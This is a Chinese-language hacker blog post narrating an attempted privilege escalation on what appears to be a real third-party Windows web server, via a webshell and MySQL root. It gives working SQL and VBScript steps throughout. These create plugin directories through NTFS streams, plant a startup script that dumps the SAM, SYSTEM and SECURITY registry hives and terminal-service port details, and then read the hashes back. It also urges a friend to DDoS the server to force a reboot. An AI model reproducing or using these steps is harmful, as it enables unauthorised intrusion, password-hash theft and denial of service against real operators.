鸡肋提权之变态root利用

你急有毛用，我电脑没带，怎么搞？
联系了基友adminlm牛看看吧，他说有防护软件啥的，有root，无法UDF，于是我让他去Mof，经历一番周折，知道了，对mof目录也锁定了权限，无法用root导出mof文件到目录。。。卧槽，

由于我无法电脑操作，我又给他提供了一些思路，php无法调用ws组建，试试asp，后来听火龙瘠薄说整个服务器全都是phpweb的站点，。。提权陷入僵局。

后来喝了一杯82年的乐事冷静了一下，最后一招，写启动。。

于是让adminlm测试，他不知道再搞些什么东西，也听不懂我的思路，

。。。。我还是自己来吧。。。。

找个语文课的时间，啪。。，飞出来了。。。

直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录，需要用NTFS ads 引流来创建

1.  
   1.  select @@basedir;   
   2.  
   3. //查找到mysql的目录 这里回显：D:\Huweishen.com\PHPWEB\MySQL Server 5.5
   4.  
   5. select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';   
   6.  
   7. //利用NTFS ADS创建lib目录  注意路径的替换。还有\换成\\  
   8.  
   9. select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
   10.  
   11. //利用NTFS ADS创建plugin目录

这样啊  adminlm来的时候已经创建了  已经存在目录

1.  
   1. File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists

导出试试看  估计不行  要不然adminlm、早拿下了

mof我也不测试哦了，估计也是不行  因为这个鸟东西在，护卫神！！

写启动项添加用户我也不测试了  万一上面有什么防护软件直接就阻止了

思路还有的，三行代码导hash，破解。ok

然后有人不服，你破解出来又如何，端口你知道？？？？

哦，我不知道，但是我还是可以查。。。看操作吧

建表：

1.  
   1. create table binghe (cmd text);

好了，我们创建了一个新的表，表名为binghe，表中只存放一个字段，字段名为cmd，为text文本。
在表中插入内容

1.  
   1. insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );

插入三行代码导出hash，

Code1=reg save hklm\sam sam.hive
code2=reg save hklm\system ystem.hive
code3=reg save hklm\security security.hive

1.  
   1. insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );

三行代码运行之后会在启动目录生成三个文件，到时候loadfile读取，然后本地破解就可以获得管理密码

那么如何获得端口号？？

呵呵，这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt

1.  
   1. insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
   2.  
   3. 注：这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

再来，查询端口服务，并将结果追加写入（>>）shell目录的binghe.txt

1.  
   1. insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) ");
   2.  
   3. 注：这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

看看我在shell上面的实际操作

s这里打了性感的马赛克

来查一下是不是写进去了？？

1.  
   1. select * from binghe;

如图，哈哈，不错

好了，一切完毕  开始导出到启动项

1.  
   1. select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";

再来loadfile看看
应该写进去了

接下来的事就不是我的事情了

@火龙，交给你，你不是说你的朋友有多少多少G纯流量吗，狠狠地ddos，打到管理员他喊叔叔也不停，然后他就去重启服务器了，然后。。你懂得！

还是说下吧，重启之后，按照我的预想，会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt（内容包括termservice进程服务的pid和端口细节及对应pid，会提权的人都知道这两个pid对比就会获得终端端口号）  ，另外在启动目录会生成三个hash的文件，到时候你来找我，我去loadfile他的hash，命令如下：

1.  
   1. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
   2.  
   3.  
   4.  
   5. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
   6.  
   7.  
   8.  
   9. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
   10.  
   11.  
   12.  
   13. 注：file1\file2\file3 分别为三个hash文件

额，这是最后的思路了，比较鸡肋。。。

静待重启吧，时间问题。。

另外谢谢adminlm大牛帮我测试，好机油，下次去找你玩哈

另外说一句，谁对我好我对谁好，火龙大哥帮过我不少，他有问题我当倾力解决。。。不说了，我该回去了  卧槽  还要FQ进去。。别举报我！